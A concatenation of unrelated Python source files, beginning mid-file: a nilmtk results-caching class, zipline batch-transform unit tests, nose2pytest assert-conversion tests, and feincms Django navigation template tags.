        The two sets of results must be for exactly the same timeframes.
        Parameters
        ----------
        other : Results subclass (same class as self).
            Results calculated from another table of data.
        """
        assert isinstance(other, self.__class__)
        # NOTE(review): this base implementation only validates that both
        # result sets cover identical periods; merging of the stat columns
        # presumably happens in subclasses — confirm.  Also note that
        # `other._data['end'].loc[i]` is evaluated before the
        # `i not in other._data.index` membership test, so a missing index
        # raises KeyError instead of the RuntimeError below.
        for i, row in self._data.iterrows():
            if (other._data['end'].loc[i] != row['end'] or
                i not in other._data.index):
                raise RuntimeError("The sections we are trying to merge"
                                   " do not have the same end times so we"
                                   " cannot merge them.")
    def import_from_cache(self, cached_stat, sections):
        """
        Parameters
        ----------
        cached_stat : DataFrame of cached data
        sections : list of nilmtk.TimeFrame objects
            describing the sections we want to load stats for.
        """
        if cached_stat.empty:
            return
        tz = get_tz(cached_stat)
        usable_sections_from_cache = []
        def append_row(row, section):
            # astype(object) before mutating — presumably to avoid dtype
            # coercion of the localized timestamp; TODO confirm.
            row = row.astype(object)
            # We stripped off the timezone when exporting to cache
            # so now we must put the timezone back.
            row['end'] = tz_localize_naive(row['end'], tz)
            if row['end'] == section.end:
                usable_sections_from_cache.append(row)
        for section in sections:
            if not section:
                continue
            try:
                rows_matching_start = cached_stat.loc[section.start]
            except KeyError:
                pass
            else:
                if isinstance(rows_matching_start, pd.Series):
                    append_row(rows_matching_start, section)
                else:
                    # Several cached rows share this start timestamp.
                    for row_i in range(rows_matching_start.shape[0]):
                        row = rows_matching_start.iloc[row_i]
                        append_row(row, section)
        self._data = pd.DataFrame(usable_sections_from_cache)
        self._data.sort_index(inplace=True)
    def export_to_cache(self):
        """
        Returns
        -------
        pd.DataFrame
        Notes
        -----
        Objects are converted using `DataFrame.convert_objects()`.
        The reason for doing this is to strip out the timezone
        information from data columns.  We have to do this otherwise
        Pandas complains if we try to put a column with multiple
        timezones (e.g. Europe/London across a daylight saving
        boundary).
        """
        # NOTE(review): convert_objects() was removed in modern pandas.
        return self._data.convert_objects()
    def timeframes(self):
        """Returns a list of timeframes covered by this Result."""
        # For some reason, using `iterrows()` messes with the
        # timezone of the index, hence we need to 'manually' iterate
        # over the rows.
        return [TimeFrame(self._data.index[i], self._data.iloc[i]['end'])
                for i in range(len(self._data))]
    def _columns_with_end_removed(self):
        """Return the stat column names (everything except 'end')."""
        cols = set(self._data.columns)
        if len(cols) > 0:
            cols.remove('end')
        cols = list(cols)
        return cols
    def __repr__(self):
        return str(self._data)
|
|
#
# Copyright 2013 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import deque
import pytz
import numpy as np
import pandas as pd
from datetime import datetime
from unittest import TestCase
from zipline.utils.test_utils import setup_logger, teardown_logger
from zipline.sources.data_source import DataSource
import zipline.utils.factory as factory
from zipline.transforms import batch_transform
from zipline.test_algorithms import (BatchTransformAlgorithm,
BatchTransformAlgorithmMinute,
ReturnPriceBatchTransform)
from zipline.algorithm import TradingAlgorithm
from zipline.utils.tradingcalendar import trading_days
from copy import deepcopy
@batch_transform
def return_price(data):
    """Batch transform that simply returns the price window."""
    prices = data.price
    return prices
class BatchTransformAlgorithmSetSid(TradingAlgorithm):
    """Algorithm whose batch transform is configured with explicit sids."""

    def initialize(self, sids=None):
        # Collected batch-transform outputs, one entry per bar.
        self.history = []
        transform_config = dict(
            refresh_period=1,
            window_length=10,
            clean_nans=False,
            sids=sids,
            compute_only_full=False,
        )
        self.batch_transform = return_price(**transform_config)

    def handle_data(self, data):
        result = self.batch_transform.handle_data(data)
        # Deep-copy so later mutation of the transform output cannot
        # retroactively change the recorded history.
        self.history.append(deepcopy(result))
class DifferentSidSource(DataSource):
    """Event source that emits a brand-new sid for every trading day."""

    def __init__(self):
        self.dates = pd.date_range('1990-01-01', periods=180, tz='utc')
        self.start = self.dates[0]
        self.end = self.dates[-1]
        self._raw_data = None
        self.sids = range(90)
        self.sid = 0
        # Trading days actually emitted by the generator.
        self.trading_days = []

    @property
    def instance_hash(self):
        return '1234'

    @property
    def raw_data(self):
        # Lazily create the event generator on first access.
        if not self._raw_data:
            self._raw_data = self.raw_data_gen()
        return self._raw_data

    @property
    def mapping(self):
        identity = lambda x: x
        return {
            'dt': (identity, 'dt'),
            'sid': (identity, 'sid'),
            'price': (float, 'price'),
            'volume': (int, 'volume'),
        }

    def raw_data_gen(self):
        """Yield one event per trading day, each carrying a fresh sid."""
        for date in self.dates:
            # Skip non-trading days entirely.
            if date not in trading_days:
                continue
            event = {'dt': date,
                     'sid': self.sid,
                     'price': self.sid,
                     'volume': self.sid}
            self.sid += 1
            self.trading_days.append(date)
            yield event
class TestChangeOfSids(TestCase):
    """Checks that a batch transform tracks sids that appear over time."""
    def setUp(self):
        # 90 distinct sids; DifferentSidSource introduces one per trading day.
        self.sids = range(90)
        self.sim_params = factory.create_simulation_parameters(
            start=datetime(1990, 1, 1, tzinfo=pytz.utc),
            end=datetime(1990, 1, 8, tzinfo=pytz.utc)
        )
    def test_all_sids_passed(self):
        algo = BatchTransformAlgorithmSetSid(
            sim_params=self.sim_params,
            identifiers=[i for i in range(0, 90)]
        )
        source = DifferentSidSource()
        algo.run(source)
        # Each captured window must end on the corresponding trading day
        # and contain every sid seen so far.
        for i, (df, date) in enumerate(zip(algo.history, source.trading_days)):
            self.assertEqual(df.index[-1], date, "Newest event doesn't \
match.")
            for sid in self.sids[:i]:
                self.assertIn(sid, df.columns)
            self.assertEqual(df.iloc[-1].iloc[-1], i)
class TestBatchTransformMinutely(TestCase):
    """Batch-transform behaviour when running against minutely bars."""

    def setUp(self):
        setup_logger(self)
        sim_start = pd.datetime(1990, 1, 3, 0, 0, 0, 0, pytz.utc)
        sim_end = pd.datetime(1990, 1, 8, 0, 0, 0, 0, pytz.utc)
        self.sim_params = factory.create_simulation_parameters(
            start=sim_start,
            end=sim_end,
        )
        self.sim_params.emission_rate = 'daily'
        self.sim_params.data_frequency = 'minute'
        self.source, self.df = \
            factory.create_test_df_source(bars='minute')

    def tearDown(self):
        teardown_logger(self)

    def test_core(self):
        algo = BatchTransformAlgorithmMinute(sim_params=self.sim_params)
        algo.run(self.source)
        # 6.5 trading hours per day * 60 minutes = bars per window day.
        bars_per_window = int(algo.window_length * 6.5 * 60)
        for window in algo.history[bars_per_window:]:
            self.assertEqual(len(window), bars_per_window)

    def test_window_length(self):
        algo = BatchTransformAlgorithmMinute(sim_params=self.sim_params,
                                             window_length=1, refresh_period=0)
        algo.run(self.source)
        bars_per_window = int(algo.window_length * 6.5 * 60)
        # Until the window fills, the transform must emit None.
        np.testing.assert_array_equal(algo.history[:(bars_per_window - 1)],
                                      [None] * (bars_per_window - 1))
        for window in algo.history[bars_per_window:]:
            self.assertEqual(len(window), bars_per_window)
class TestBatchTransform(TestCase):
    """End-to-end checks of the daily batch-transform machinery."""

    def setUp(self):
        setup_logger(self)
        self.sim_params = factory.create_simulation_parameters(
            start=datetime(1990, 1, 1, tzinfo=pytz.utc),
            end=datetime(1990, 1, 8, tzinfo=pytz.utc)
        )
        self.source, self.df = \
            factory.create_test_df_source(self.sim_params)

    def tearDown(self):
        teardown_logger(self)

    def test_core_functionality(self):
        algo = BatchTransformAlgorithm(sim_params=self.sim_params)
        algo.run(self.source)
        wl = algo.window_length
        # The following assertion depend on window length of 3
        self.assertEqual(wl, 3)
        # If window_length is 3, there should be 2 None events, as the
        # window fills up on the 3rd day.
        n_none_events = 2
        self.assertEqual(algo.history_return_price_class[:n_none_events],
                         [None] * n_none_events,
                         "First two iterations should return None." + "\n" +
                         "i.e. no returned values until window is full'" +
                         "%s" % (algo.history_return_price_class,))
        self.assertEqual(algo.history_return_price_decorator[:n_none_events],
                         [None] * n_none_events,
                         "First two iterations should return None." + "\n" +
                         "i.e. no returned values until window is full'" +
                         "%s" % (algo.history_return_price_decorator,))

        # After three Nones, the next value should be a data frame
        self.assertTrue(isinstance(
            algo.history_return_price_class[wl],
            pd.DataFrame)
        )

        # Test whether arbitrary fields can be added to datapanel
        field = algo.history_return_arbitrary_fields[-1]
        self.assertTrue(
            'arbitrary' in field.items,
            'datapanel should contain column arbitrary'
        )
        self.assertTrue(all(
            field['arbitrary'].values.flatten() ==
            [123] * algo.window_length),
            'arbitrary dataframe should contain only "test"'
        )

        # Sid filtering: only sid 0 should survive the filter.
        for data in algo.history_return_sid_filter[wl:]:
            self.assertIn(0, data.columns)
            self.assertNotIn(1, data.columns)

        # Field filtering: 'price' survives, 'ignore' is dropped.
        for data in algo.history_return_field_filter[wl:]:
            self.assertIn('price', data.items)
            self.assertNotIn('ignore', data.items)

        # Without a field filter, both fields are present.
        for data in algo.history_return_field_no_filter[wl:]:
            self.assertIn('price', data.items)
            self.assertIn('ignore', data.items)

        for data in algo.history_return_ticks[wl:]:
            self.assertTrue(isinstance(data, deque))

        for data in algo.history_return_not_full:
            self.assertIsNot(data, None)

        # test overloaded class
        for test_history in [algo.history_return_price_class,
                             algo.history_return_price_decorator]:
            # starting at window length, the window should contain
            # consecutive (of window length) numbers up till the end.
            for i in range(algo.window_length, len(test_history)):
                np.testing.assert_array_equal(
                    range(i - algo.window_length + 2, i + 2),
                    test_history[i].values.flatten()
                )

    def test_passing_of_args(self):
        algo = BatchTransformAlgorithm(1, kwarg='str',
                                       sim_params=self.sim_params)
        algo.run(self.source)
        # Positional and keyword args given to the algorithm must round-trip.
        self.assertEqual(algo.args, (1,))
        self.assertEqual(algo.kwargs, {'kwarg': 'str'})

        expected_item = ((1, ), {'kwarg': 'str'})
        self.assertEqual(
            algo.history_return_args,
            [
                # 1990-01-01 - market holiday, no event
                # 1990-01-02 - window not full
                None,
                # 1990-01-03 - window not full
                None,
                # 1990-01-04 - window now full, 3rd event
                expected_item,
                # 1990-01-05 - window now full
                expected_item,
                # 1990-01-08 - window now full
                expected_item
            ])
def run_batchtransform(window_length=10):
    """Drive a ReturnPriceBatchTransform over five years of test data."""
    sim_params = factory.create_simulation_parameters(
        start=datetime(1990, 1, 1, tzinfo=pytz.utc),
        end=datetime(1995, 1, 8, tzinfo=pytz.utc),
    )
    source, _ = factory.create_test_df_source(sim_params)

    transform = ReturnPriceBatchTransform(
        refresh_period=1,
        window_length=window_length,
        clean_nans=False,
    )

    # Feed each raw event through the transform keyed by sid 0.
    for raw_event in source:
        raw_event['datetime'] = raw_event.dt
        transform.handle_data({0: raw_event})
|
|
import logging
import sys
from logging import StreamHandler
from textwrap import dedent
import pytest
from nose2pytest.script import NoseConversionRefactoringTool
# Module-level fixtures shared by every test below.
log = logging.getLogger('nose2pytest')

# Namespaces the checks exec statements in: the nose-style originals need
# nose's assert_* helpers, the converted asserts need re/collections.
nosetools = {}
pytesttools = {}

# Single refactoring tool instance reused by all checks.
refac = NoseConversionRefactoringTool()
@pytest.fixture(scope="session", autouse=True)
def setup_log():
    """Session fixture: route log output to stdout and fill exec namespaces."""
    handler = StreamHandler(stream=sys.stdout)
    handler.setLevel(logging.DEBUG)
    log.addHandler(handler)
    log.setLevel(logging.DEBUG)

    # Collect nose's assert_* helpers for exec-ing the original statements.
    import nose.tools
    for name, val in vars(nose.tools).items():
        if name.startswith('assert_'):
            nosetools[name] = val

    # The converted statements may reference re / collections directly.
    import re
    import collections
    pytesttools['re'] = re
    pytesttools['collections'] = collections
def check_transformation(input, expect):
    """Assert that refactoring ``input`` yields exactly ``expect``."""
    converted = refac.refactor_string(dedent(input + '\n'), 'script')
    assert str(converted) == dedent(expect + '\n')
def check_passes(refac, statement_in, expect_out):
    """Convert a passing assert; both versions must execute cleanly."""
    converted = str(refac.refactor_string(statement_in + '\n', 'script'))
    # The nose-style original and the converted assert must both pass.
    exec(statement_in, nosetools)
    exec(converted, pytesttools)
    assert converted == expect_out + '\n'
def check_fails(refac, statement_in, expect_out):
    """Convert a failing assert; both versions must raise AssertionError."""
    converted = str(refac.refactor_string(statement_in + '\n', 'script'))
    pytest.raises(AssertionError, exec, statement_in, nosetools)
    pytest.raises(AssertionError, exec, converted, pytesttools)
    assert converted == expect_out + '\n'
class Test1Arg:
    """Conversions of single-argument nose asserts (assert_true & friends)."""

    def test_params(self):
        # The optional message may be positional or passed as msg=; both
        # forms become the assert statement's message expression.
        test_script = """
            log.print("hi")
            assert_true(a)
            assert_true(a, 'text')
            assert_true(a, msg='text')
            """
        check_transformation(test_script, """
            log.print("hi")
            assert a
            assert a, 'text'
            assert a, 'text'
            """)

    def test_parens(self):
        # A multi-line expression gets wrapped in parentheses.
        check_transformation('assert_true(a + \nb)', 'assert (a + \nb)')

    def test_generator(self):
        # A bare generator expression must also be parenthesized.
        check_transformation('assert_true(x for x in range(1))', 'assert (x for x in range(1))')

    def test_same_results(self):
        # Each converted statement must pass/fail exactly like the original.
        check_passes(refac, 'assert_true(True)', 'assert True')
        check_fails(refac, 'assert_true(False)', 'assert False')

        check_passes(refac, 'assert_false(False)', 'assert not False')
        check_fails(refac, 'assert_false(True)', 'assert not True')

        check_passes(refac, 'assert_is_none(None)', 'assert None is None')
        check_fails(refac, 'assert_is_none("")', 'assert "" is None')

        check_passes(refac, 'assert_is_not_none("")', 'assert "" is not None')
        check_fails(refac, 'assert_is_not_none(None)', 'assert None is not None')
class Test2Args:
    """Conversions of two-argument nose asserts (membership, comparisons)."""

    def test_params(self):
        # Message handling mirrors the one-argument case.
        test_script = """
            assert_in(a, b)
            assert_in(a, b, 'text')
            assert_in(a, b, msg='text')
            """
        check_transformation(test_script, """
            assert a in b
            assert a in b, 'text'
            assert a in b, 'text'
            """)

    def test_dont_add_parens(self):
        # Atoms, attribute access, calls, subscripts, unary and arithmetic
        # expressions bind tighter than `in` and need no extra parentheses.
        check_transformation('assert_in(a, c)',
                             'assert a in c')
        check_transformation('assert_in(a.b, c)',
                             'assert a.b in c')
        check_transformation('assert_in(a.b(), c)',
                             'assert a.b() in c')
        check_transformation('assert_in(a(), d)',
                             'assert a() in d')
        check_transformation('assert_in(a[1], d)',
                             'assert a[1] in d')
        check_transformation('assert_in((a+b), d)',
                             'assert (a+b) in d')
        check_transformation('assert_in((a+b), d)',
                             'assert (a+b) in d')
        check_transformation('assert_in(-a, +b)',
                             'assert -a in +b')

    def test_add_parens(self):
        # Comparisons and boolean operators bind more loosely than the
        # generated `in` / `==`, so they must be parenthesized.
        check_transformation('assert_in(a == b, d)',
                             'assert (a == b) in d')
        check_transformation('assert_in(a != b, d)',
                             'assert (a != b) in d')
        check_transformation('assert_in(b <= c, d)',
                             'assert (b <= c) in d')
        check_transformation('assert_in(c >= d, d)',
                             'assert (c >= d) in d')
        check_transformation('assert_in(d < e, d)',
                             'assert (d < e) in d')
        check_transformation('assert_in(d > e, d)',
                             'assert (d > e) in d')
        check_transformation('assert_equal(a in b, c)',
                             'assert (a in b) == c')
        check_transformation('assert_equal(a not in b, c)',
                             'assert (a not in b) == c')
        check_transformation('assert_equal(a is b, c)',
                             'assert (a is b) == c')
        check_transformation('assert_equal(a is not b, c)',
                             'assert (a is not b) == c')
        check_transformation('assert_equal(not a, c)',
                             'assert (not a) == c')
        check_transformation('assert_equal(a and b, c or d)',
                             'assert (a and b) == (c or d)')
        check_transformation('assert_in(a.b + c, d)',
                             'assert a.b + c in d')
        check_transformation('assert_in(a() + b, d)',
                             'assert a() + b in d')
        check_transformation('assert_in(a + b, c + d)',
                             'assert a + b in c + d')
        check_transformation('assert_in(a + b, c + d, "text")',
                             'assert a + b in c + d, "text"')
        check_transformation('assert_equal(a + b if c + d < 0 else e + f if g+h < 0 else i + j, -100)',
                             'assert (a + b if c + d < 0 else e + f if g+h < 0 else i + j) == -100')

    def test_newline_all(self):
        # Multi-line arguments: the conversion keeps the original line
        # breaks and wraps the whole expression in parentheses.
        test_script = """
            assert_in(long_a,
                      long_b)
            """
        check_transformation(test_script, """
            assert (long_a in
                      long_b)
            """)

        test_script = """
            assert_in(
                long_a, long_b)
            """
        check_transformation(test_script, """
            assert (
                long_a in long_b)
            """)

        test_script = """
            assert_in(long_a,
                      long_b + something)
            """
        check_transformation(test_script, """
            assert (long_a in
                      long_b + something)
            """)

        test_script = """
            assert_in(long_a,
                      long_b > something)
            """
        check_transformation(test_script, """
            assert (long_a in
                      (long_b > something))
            """)

        test_script = """
            assert_in(a, long_b +
                         something)
            """
        check_transformation(test_script, """
            assert (a in long_b +
                         something)
            """)

    def test_same_results(self):
        # Each pair: the nose call and its converted assert must agree on
        # pass/fail for concrete values.
        check_passes(refac, 'assert_equal(123, 123)', 'assert 123 == 123')
        check_fails(refac, 'assert_equal(123, 456)', 'assert 123 == 456')
        check_passes(refac, 'assert_equals(123, 123)', 'assert 123 == 123')
        check_fails(refac, 'assert_equals(123, 456)', 'assert 123 == 456')

        check_passes(refac, 'assert_not_equal(123, 456)', 'assert 123 != 456')
        check_fails(refac, 'assert_not_equal(123, 123)', 'assert 123 != 123')
        check_passes(refac, 'assert_not_equals(123, 456)', 'assert 123 != 456')
        check_fails(refac, 'assert_not_equals(123, 123)', 'assert 123 != 123')

        check_passes(refac, 'assert_list_equal([123, 456], [123, 456])', 'assert [123, 456] == [123, 456]')
        check_fails(refac, 'assert_list_equal([123, 123], [123, 456])', 'assert [123, 123] == [123, 456]')

        check_passes(refac, 'assert_tuple_equal((123, 456), (123, 456))', 'assert (123, 456) == (123, 456)')
        check_fails(refac, 'assert_tuple_equal((123, 123), (123, 456))', 'assert (123, 123) == (123, 456)')

        check_passes(refac, 'assert_set_equal({123, 456}, {123, 456})', 'assert {123, 456} == {123, 456}')
        check_fails(refac, 'assert_set_equal({123, 123}, {123, 456})', 'assert {123, 123} == {123, 456}')

        check_passes(refac, 'assert_dict_equal(dict(a=123, b=456), dict(a=123, b=456))', 'assert dict(a=123, b=456) == dict(a=123, b=456)')
        check_fails(refac, 'assert_dict_equal(dict(a=123, b=456), dict(a=123, b=123))', 'assert dict(a=123, b=456) == dict(a=123, b=123)')
        check_fails(refac, 'assert_dict_equal(dict(a=123, b=456), dict(a=123, c=456))', 'assert dict(a=123, b=456) == dict(a=123, c=456)')

        check_passes(refac, 'assert_multi_line_equal("""1\n2\n""", """1\n2\n""")', 'assert """1\n2\n""" == """1\n2\n"""')
        check_fails(refac, 'assert_multi_line_equal("""1\n2\n""", """1\n3\n""")', 'assert """1\n2\n""" == """1\n3\n"""')

        check_passes(refac, 'assert_greater(123, 1)', 'assert 123 > 1' )
        check_fails(refac, 'assert_greater(123, 123)', 'assert 123 > 123')
        check_fails(refac, 'assert_greater(123, 456)', 'assert 123 > 456')

        check_passes(refac, 'assert_greater_equal(123, 1)', 'assert 123 >= 1' )
        check_passes(refac, 'assert_greater_equal(123, 123)', 'assert 123 >= 123')
        check_fails(refac, 'assert_greater_equal(123, 456)', 'assert 123 >= 456')

        check_passes(refac, 'assert_less(123, 456)', 'assert 123 < 456')
        check_fails(refac, 'assert_less(123, 123)', 'assert 123 < 123')
        check_fails(refac, 'assert_less(123, 1)', 'assert 123 < 1' )

        check_passes(refac, 'assert_less_equal(123, 456)', 'assert 123 <= 456')
        check_passes(refac, 'assert_less_equal(123, 123)', 'assert 123 <= 123')
        check_fails(refac, 'assert_less_equal(123, 1)' , 'assert 123 <= 1' )

        check_passes(refac, 'assert_in(123, [123, 456])', 'assert 123 in [123, 456]')
        check_fails(refac, 'assert_in(123, [789, 456])', 'assert 123 in [789, 456]')

        check_passes(refac, 'assert_not_in(123, [789, 456])', 'assert 123 not in [789, 456]')
        check_fails(refac, 'assert_not_in(123, [123, 456])', 'assert 123 not in [123, 456]')

        check_passes(refac, 'assert_is(123, 123)', 'assert 123 is 123')
        check_fails(refac, 'assert_is(123, 1)', 'assert 123 is 1')

        check_passes(refac, 'assert_is_not(123, 1)', 'assert 123 is not 1')
        check_fails(refac, 'assert_is_not(123, 123)', 'assert 123 is not 123')

        check_passes(refac, 'assert_is_instance(123, int)', 'assert isinstance(123, int)')
        check_fails(refac, 'assert_is_instance(123, float)', 'assert isinstance(123, float)')

        check_passes(refac, 'assert_count_equal([456, 789, 456], [456, 456, 789])',
                     'assert collections.Counter([456, 789, 456]) == collections.Counter([456, 456, 789])')
        check_fails(refac, 'assert_count_equal([789, 456], [456])',
                    'assert collections.Counter([789, 456]) == collections.Counter([456])')

        check_passes(refac, 'assert_regex("125634", "12.*34")', 'assert re.search("12.*34","125634")')
        check_fails(refac, 'assert_regex("125678", "12.*34")', 'assert re.search("12.*34","125678")')

        check_passes(refac, 'assert_not_regex("125678", "12.*34")', 'assert not re.search("12.*34","125678")')
        check_fails(refac, 'assert_not_regex("125634", "12.*34")', 'assert not re.search("12.*34","125634")')
class Test3Args:
    """Conversions of assert_almost_equal-style calls using ``delta``."""

    def test_no_add_parens(self):
        # Tight-binding operands need no parentheses inside abs(...).
        check_transformation('assert_almost_equal(a * b, ~c, delta=d**e)', 'assert abs(a * b - ~c) <= d**e')

    def test_add_parens(self):
        # Loose-binding operands (comparisons, |, &, or, shifts) must be
        # parenthesized so the generated subtraction groups correctly.
        check_transformation('assert_almost_equal(a + b, c, delta=d>e)', 'assert abs((a + b) - c) <= (d>e)')
        check_transformation('assert_almost_equal(a | b, c ^ d, delta=0.1)', 'assert abs((a | b) - (c ^ d)) <= 0.1')
        check_transformation('assert_almost_equal(a & b, c << d, delta=0.1)', 'assert abs((a & b) - (c << d)) <= 0.1')
        check_transformation('assert_almost_equal(a or b, c >> d, delta=0.1)', 'assert abs((a or b) - (c >> d)) <= 0.1')

    def test_almost_equal(self):
        # delta and msg may appear in either order, positionally mixed.
        check_passes(refac, 'assert_almost_equal(123.456, 123.5, delta=0.1)', 'assert abs(123.456 - 123.5) <= 0.1')
        check_passes(refac, 'assert_almost_equal(123.456, 123.5, delta=0.2, msg="text")', 'assert abs(123.456 - 123.5) <= 0.2, "text"')
        check_passes(refac, 'assert_almost_equal(123.456, 123.5, msg="text", delta=0.3)', 'assert abs(123.456 - 123.5) <= 0.3, "text"')
        check_fails(refac, 'assert_almost_equal(123.456, 124, delta=0.1)', 'assert abs(123.456 - 124) <= 0.1')

        check_passes(refac, 'assert_almost_equals(123.456, 123.5, delta=0.1)', 'assert abs(123.456 - 123.5) <= 0.1')
        check_passes(refac, 'assert_almost_equals(123.456, 123.5, delta=0.2, msg="text")', 'assert abs(123.456 - 123.5) <= 0.2, "text"')
        check_passes(refac, 'assert_almost_equals(123.456, 123.5, msg="text", delta=0.3)', 'assert abs(123.456 - 123.5) <= 0.3, "text"')
        check_fails(refac, 'assert_almost_equals(123.456, 124, delta=0.1)', 'assert abs(123.456 - 124) <= 0.1')

        check_passes(refac, 'assert_not_almost_equal(123.456, 123.5, delta=0.01)', 'assert abs(123.456 - 123.5) > 0.01')
        check_passes(refac, 'assert_not_almost_equal(123.456, 123.5, delta=0.02, msg="text")', 'assert abs(123.456 - 123.5) > 0.02, "text"')
        check_passes(refac, 'assert_not_almost_equal(123.456, 123.5, msg="text", delta=0.03)', 'assert abs(123.456 - 123.5) > 0.03, "text"')
        check_fails(refac, 'assert_not_almost_equal(123.456, 124, delta=0.6)', 'assert abs(123.456 - 124) > 0.6')

        check_passes(refac, 'assert_not_almost_equals(123.456, 123.5, delta=0.01)', 'assert abs(123.456 - 123.5) > 0.01')
        check_passes(refac, 'assert_not_almost_equals(123.456, 123.5, delta=0.02, msg="text")', 'assert abs(123.456 - 123.5) > 0.02, "text"')
        check_passes(refac, 'assert_not_almost_equals(123.456, 123.5, msg="text", delta=0.03)', 'assert abs(123.456 - 123.5) > 0.03, "text"')
        check_fails(refac, 'assert_not_almost_equals(123.456, 124, delta=0.6)', 'assert abs(123.456 - 124) > 0.6')

    def test_ignore_places(self):
        # Calls that use `places` (or a bare third positional argument) are
        # intentionally left unconverted: output must equal input.
        statement_in = 'assert_almost_equal(123.456, 123.5, 2)'
        check_transformation(statement_in, statement_in)
        statement_in = 'assert_almost_equal(123.456, 123.5, places=2)'
        check_transformation(statement_in, statement_in)
class TestAssertTools:
    """Behaviour of the helper asserts installed into the pytest namespace."""

    def test_almost(self):
        # NOTE(review): these names are not part of pytest proper; they are
        # presumably injected into the pytest module by nose2pytest's
        # assert_tools plugin -- confirm the plugin is active.
        from pytest import assert_almost_equal, assert_not_almost_equal
        assert_almost_equal(1, 1.00001, 4)
        assert_not_almost_equal(1, 1.01, 3)
        pytest.raises(AssertionError, assert_almost_equal, 1, 1.01, 5)
        pytest.raises(AssertionError, assert_not_almost_equal, 1, 1.00001, 2)
        # assert_almost_equal(1, 1.01, 5)
        # assert_not_almost_equal(1, 1.00001, 2)

    def test_dict_keys_subset(self):
        dict1 = dict(a=1, b=2, c=3)

        # check keys are subset:
        dict2 = dict1.copy()
        pytest.assert_dict_contains_subset(dict1, dict2)

        # An extra key in dict2 keeps dict1 a subset.
        dict2['d'] = 4
        pytest.assert_dict_contains_subset(dict1, dict2)

        # Removing one of dict1's keys breaks the subset relation.
        del dict2['a']
        pytest.raises(AssertionError, pytest.assert_dict_contains_subset, dict1, dict2)
        # assert_dict_contains_subset(dict1, dict2)

    def test_dict_values_subset(self):
        dict1 = dict(a=1, b=2, c=3)

        # check keys are subset:
        dict2 = dict1.copy()
        dict2['d'] = 4
        # Same key, different value: not a subset any more.
        dict2['a'] = 4
        pytest.raises(AssertionError, pytest.assert_dict_contains_subset, dict1, dict2)
        # assert_dict_contains_subset(dict1, dict2)
|
|
from django import template
from django.conf import settings
from django.http import HttpRequest
from feincms.module.page.models import Page, PageManager
from feincms.utils.templatetags import *
from feincms.utils.templatetags import _parse_args
# Template tag registry for this module ({% load ... %} target).
register = template.Library()
class NavigationNode(SimpleAssignmentNodeWithVarAndArgs):
    """
    Return a list of pages to be used for the navigation

    level: 1 = toplevel, 2 = sublevel, 3 = sub-sublevel
    depth: 1 = only one level, 2 = subpages too
    extended: run navigation extension on returned pages, not only on top-level node

    If you set depth to something else than 1, you might want to look into
    the tree_info template tag from the mptt_tags library.

    Example::

        {% feincms_navigation of feincms_page as sublevel level=2,depth=1 %}
        {% for p in sublevel %}
            <a href="{{ p.get_absolute_url }}">{{ p.title }}</a>
        {% endfor %}
    """

    def what(self, instance, args):
        level = int(args.get('level', 1))
        depth = int(args.get('depth', 1))

        # A request may be passed instead of a page; resolve it first.
        if isinstance(instance, HttpRequest):
            instance = Page.objects.from_request(instance)

        entries = self._what(instance, level, depth)

        if args.get('extended', False):
            # Interleave each entry with the pages contributed by its own
            # navigation extension (if it declares one).
            _entries = list(entries)
            entries = []
            for entry in _entries:
                entries.append(entry)
                if getattr(entry, 'navigation_extension', None):
                    entries.extend(entry.extended_navigation(depth=depth,
                        request=self.render_context.get('request', None)))
        return entries

    def _what(self, instance, level, depth):
        # Return the raw page list for the requested level/depth, before any
        # extension post-processing.
        if level <= 1:
            if depth == 1:
                return Page.objects.toplevel_navigation()
            else:
                return Page.objects.in_navigation().filter(level__lt=depth)

        # mptt starts counting at 0, NavigationNode at 1; if we need the submenu
        # of the current page, we have to add 2 to the mptt level
        if instance.__class__.__name__ != 'PagePretender':
            if instance.level + 2 == level:
                pass
            elif instance.level + 2 < level:
                try:
                    queryset = instance.get_descendants().filter(level=level - 2, in_navigation=True)
                    instance = PageManager.apply_active_filters(queryset)[0]
                except IndexError:
                    return []
            else:
                instance = instance.get_ancestors()[level - 2]

        # special case for the navigation extension
        if getattr(instance, 'navigation_extension', None):
            return instance.extended_navigation(depth=depth,
                request=self.render_context.get('request', None))
        else:
            if depth == 1:
                try:
                    if instance.__class__.__name__ == 'PagePretender':
                        return instance.children
                    else:
                        return instance.children.in_navigation()
                # Was a bare ``except:``; narrowed so KeyboardInterrupt and
                # SystemExit are no longer swallowed.  Any other failure
                # still degrades to an empty navigation, as before.
                except Exception:
                    return []
            else:
                queryset = instance.get_descendants().filter(level__lte=instance.level + depth, in_navigation=True)
                return PageManager.apply_active_filters(queryset)
register.tag('feincms_navigation', do_simple_assignment_node_with_var_and_args_helper(NavigationNode))
class ExtendedNavigationNode(NavigationNode):
    """NavigationNode variant that resolves its arguments at render time."""

    def render(self, context):
        self.render_context = context
        try:
            instance = self.in_var.resolve(context)
        except template.VariableDoesNotExist:
            # Unresolvable page variable: expose an empty navigation.
            context[self.var_name] = []
        else:
            parsed_args = _parse_args(self.args, context)
            context[self.var_name] = self.what(instance, parsed_args)
        return ''
register.tag('feincms_navigation_extended', do_simple_assignment_node_with_var_and_args_helper(ExtendedNavigationNode))
# ------------------------------------------------------------------------
class ParentLinkNode(SimpleNodeWithVarAndArgs):
    """
    {% feincms_parentlink of feincms_page level=1 %}
    """

    def what(self, page, args):
        level = int(args.get('level', 1))

        # The page itself sits at the requested level.
        if page.level + 1 == level:
            return page.get_absolute_url()

        # The requested level lies below the page: nothing to link to.
        if page.level + 1 < level:
            return '#'

        try:
            return page.get_ancestors()[level - 1].get_absolute_url()
        except IndexError:
            return '#'
register.tag('feincms_parentlink', do_simple_node_with_var_and_args_helper(ParentLinkNode))
# ------------------------------------------------------------------------
class LanguageLinksNode(SimpleAssignmentNodeWithVarAndArgs):
    """
    ::

        {% feincms_languagelinks for feincms_page as links [args] %}

    This template tag needs the translations extension.

    Arguments can be any combination of:

    * all or existing: Return all languages or only those where a translation exists
    * excludecurrent: Excludes the item in the current language from the list

    The default behavior is to return an entry for all languages including the
    current language.

    Example::

        {% feincms_languagelinks for entry as links all,excludecurrent %}
        {% for key, name, link in links %}
            <a href="{% if link %}{{ link }}{% else %}/{{ key }}/{% endif %}">{% trans name %}</a>
        {% endfor %}
    """

